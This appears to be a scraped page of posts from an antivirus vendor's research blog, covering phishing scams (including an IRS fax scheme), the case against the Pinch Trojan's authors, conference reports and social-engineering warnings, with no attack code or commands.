04 Mar Phishing for dummies
06 Feb Crime and punishment
29 Oct Greetings from London
22 Dec Google helps phishers
Join our blog
You can contribute to our blog if you have +100 points. Comment on articles and blogposts, and other users will rate your comments. You receive points for positive ratings.
Yesterday we published our annual report, which includes my favourite topic - how the threat landscape’s going to change in 2009. One of the things we expect to see is an increase in the number of phishing attacks and scams on the Internet:
"Secondly, the technical sophistication needed to develop and spread new malicious programs will force many cyber criminals to search for simpler and cheaper ways of making a profit. Phishing may be one of the more attractive solutions."
And, whether by coincidence or design, yesterday I got an email which is just what I’m talking about above – a scam that’s easy and cheap to implement.
Subject: please see the attachment
Sender (fake): Internal Revenue Service [email@example.com]
Message: Please see the attachment make sure you fill all the columns and send fax to: +1-646-308-1145.
This type of phishing has been around for a while, but it’s the first time I’ve received a message like this - maybe I’ve just been lucky, because I know my address is all over spammer databases :)
This is so-called offline phishing; the bad guys don’t even go to the trouble of making a fake site, but just ask you to fax through all your details. Using a fax number gives an additional aura of credibility to the whole thing – most people have heard of phishing sites, but a lot of them won’t have heard of phishing by fax. And the combination of a government department and a fax number fits perfectly with the perception that public institutions are more than a bit behind the times.
Back in December 2007 we blogged about how the Russian Federal Security Service identified and arrested the authors of Pinch.
Yesterday a whole bunch of media in different countries referenced PrevX, who were saying that the Pinch Trojan is still very active, infecting thousands of users around the world every day.
One particularly interesting article came from The Register, a UK publication, which says:
"The two suspected authors of the virus creation toolkit were arrested and questioned by Russian police in December 2007 but never prosecuted."
These words have been reproduced in some form or another by other publications, particularly Russian ones. And of course, such statements beg the question “why haven’t the authors of Pinch been sentenced?”
As we’ve always been on the front line in the fight against Pinch, and we tracked the history of Pinch very carefully indeed, of course we’re able to answer this question.
The people who created and spread Pinch were identified, and the surnames given in the media – Ermishkin and Farkhutdinov – belong to these people. A criminal case was raised, with the investigation being carried out throughout 2008. The fact that the investigation took so long reflects the complexity of the Pinch story.
Greetings from London – or more specifically from RSA Europe 2008. Denis, Andrei, Roel and I are all here at this year's conference which is dedicated to Alan Turing, the great British mathematician and cryptographer.
If you keep your ears open, the names you'll hear most frequently are Turing, Enigma, and Bruce Schneier. The conference includes a display of cipher machines from a range of eras and countries, including the Enigma machine whose code Turing helped to break. Needless to say, there's no shortage of people wanting to take a look!
We always expect a rise in cyber crime in the holiday season. This year, for instance, we have seen a noticeable rise in spam, along with a rise in phishing.
I have even received a phishing email in my Gmail mailbox – the first one in ages. The phish was nothing special; the usual notification about a new payment system for an online bank with a link to the spoofed website.
What caught my eye was how Google handled the phish. The Gmail interface added a number of relevant paid advertising links to the email. Take a look at the upper left and lower right corners:
I think that adding such links increase user trust in fraudulent emails. Users see that Google has included keyword-related links, so they are liable to trust the email – and fall victim to the phishing scam.
What do you think? In any case, holidays are unfortunately a busy time for criminals in all spheres, including the Internet. Take care of yourself and safe surfing!
Hello from Tianjin in China, and the AVAR 2005 conference. We're 150km from Peking, near the Bohai sea. This year's conference is the eighth annual event for virus analysts from the Asian region, and it's one of the highlights of an antivirus researcher's calendar, together with VB, CARO and EICAR.
This year attendance is good, with leading virus analysts along with IT industry people and government officials. For instance, speakers include Dmitry Gryaznov and Igor Muttik from McAfee, Vesselin Bontchev from Frisk and Eugene from...well, we know where he's from.
There are also speakers from the Chinese Ministry of the Interior, which has done a lot in the past few years to combat cyber crime.
Eugene's presentation was greeted enthusiastically and there were lots of questions. While he was speaking, I started doing a bit of research. I wanted to check out the wireless Internet connections, as well as mobile devices.
I found 3 WiFi-networks straight away. None of them encrypted traffic, but all of them had built-in DHCP servers. In short, all 3 were potentially vulnerable to war drivers. By the way, tomorrow I'm going to scan other WiFi networks in Tianjin and Peking.
Next I took a Bluetooth transmitter with a 100 meter radius and walked around the conference hall scanning for Bluetooth devices in 'visible to all' mode. I found plenty:
Overall, I found 9 mobile devices with Bluetooth 'visible to all' mode enabled, 8 of them Nokia smartphones. Yes, I know. You'd think that people attending an antivirus conference would know better. In fact, I had been hoping that I wouldn't find any at all.
The good news is that none of the phones were infected with Cabir. At least, not yet...
Today I ran across an interesting piece of spam. The ending contained an offer to unsubscribe by clicking "here". Naturally, I clicked and landed on a web page (HTML) that supposedly checked my name against a database. The page then showed me the following message: "your address has been removed from the mailing list".
Sounds reasonable, doesn't it? But ... the end of the HTML file contains Exploit.HTML.Mht which uses the MHTML URL Processing Vulnerability to download malware: in my case it was Trojan-Dropper.Win32.Small.gr and Trojan-Spy.Win32.Banker.s.
Good reminder - never, ever unsubscribe from spam. At best you let the spammer know your address is live, and at worst you end up with an infected computer.
We are seeing an increase in spam sent via the MS Windows Messenger service. Spammers are abusing a feature in the service to trigger fake error or warning messages from the messenger service.
Very often, the message warns users that a significant number of spyware programs have been detected on their machine and recommends that users download an anti-spyware program.
Naturally, this is an attempt to trick users into downloading Trojans, in the worst case scenario, or in the best case scenario, useless utilities that imitate spyware detection. In any case, adware and spyware are neither detected nor removed.
What we are seeing is virus writers adapting the never-ending social engineering technique of picking up on a well-publicized security issue. This time the media attention and public awareness of the term spyware is being exploited.
We urge users to be aware that such messages are fake and to avoid downloading any programs advertised in this manner. This kind of spam can be prevented on PCs where you have admin rights by disabling the Messenger service C:\WINDOWS\System32\svchost.exe -k netsvcs or Control Panel
Read more about MS Windows Messenger Service:
Kevin Mitnick, the infamous ex-hacker, visited Moscow yesterday where he spoke about social engineering at an information security forum. It would be difficult to imagine a more appropriate speaker, since Kevin was the first to introduce the term social engineering to computer security. In fact he was the first cyber criminal to use social engineering techniques for profit. Today, Kevin is using his expertise to protect users from other 'social engineers'.
The presentation itself was fascinating, but the real reason I wanted to tell you about it is :
Valentine's Day. A day to tell the people you love exactly how much you love them. However, it is also a day that virus writers love, too. For the past few years we have witnessed mass mailings of Trojans and worms masquerading as valentines: a perfect example of social engineering. Most people are eager and willing to believe that a 'secret admirer' has sent them a card and open the attachment or click on the link.
Just think about it. Think about how long social engineering techniques have been used to dupe gullible people – again and again. Make a resolution: to treat electronic valentines with due suspicion this year. Finally.
Police in Italy have arrested almost 40 people so far in conjunction with credit card fraud. So far, there is evidence that the gang has pocketed around 600,000 euros, but police are still investigating.
The criminals developed software that harvested credit card numbers via the Internet from users with Visa, Amex and other major credit cards.
Another blow against cyber crime, and another reminder to users that extreme caution is needed when using credit cards online.
Over the past week we saw more and more phishing emails every day. A major European ISP told us that within 24 hours they scanned 16 million messages and 268,000 were phisihng scams. And this wasn't one scam - there were many different messages targeting companies including Citibank, US Bank, EBay, Pay Pal and Sun Trust.
On the other hand, the computer underground may be taking revenge for the successful arrests of fellow cyber criminals over the past several months around the globe.
We are monitoring the situation, but do caution users to be extra careful about anwering emails from financial institutions.